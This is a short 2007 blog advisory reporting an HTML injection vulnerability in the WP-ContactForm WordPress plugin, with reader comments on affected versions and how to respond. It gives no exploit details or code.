WP-ContactForm HTML Injection Vulnerability
Filed Under (Advisories, WordPress) by DK on 19 December 2007

The popular WP-ContactForm plugin has been found vulnerable to HTML Injection.

This could allow an attacker to compromise your blog if you are authenticated to your blog while at the same time visiting a page with the embedded attack. Another popular attack is using phishing type e-mails.

BlogSec is not aware of any fixes as yet. We will update this post when more information is available to us.

Credit to Mustlive for discovering and publishing the vulnerability.

Check BlogSec’s double agent post

for HTML Injection mitigation ideas.

Comments

MustLive on 20 December, 2007 at 5:58 pm #

These are vulnerabilities in WP-ContactForm 2.0.7 (and previous 2.x versions). And recently I wrote (http://websecurity.com.ua/1641/) about XSS holes in WP-ContactForm 1.5 alpha (and previous 1.x versions) of the plugin.

So users of both original 1.x version and new 2.x version of the plugin are in risk. And they need to fix these holes.


DK on 20 December, 2007 at 7:38 pm #

Mustlive, thanks for the heads up.


Michael on 22 December, 2007 at 6:47 pm #

@mustlive… “And they need to fix these holes.”
Do you have any suggestions as to how I can fix these holes, or do I simply de-activate the plug-in?
More importantly: Is there a safe replacement plug-in?

Happy Christmas, etc.,
Michael


Comment
Name:
Email:
Website:
Message: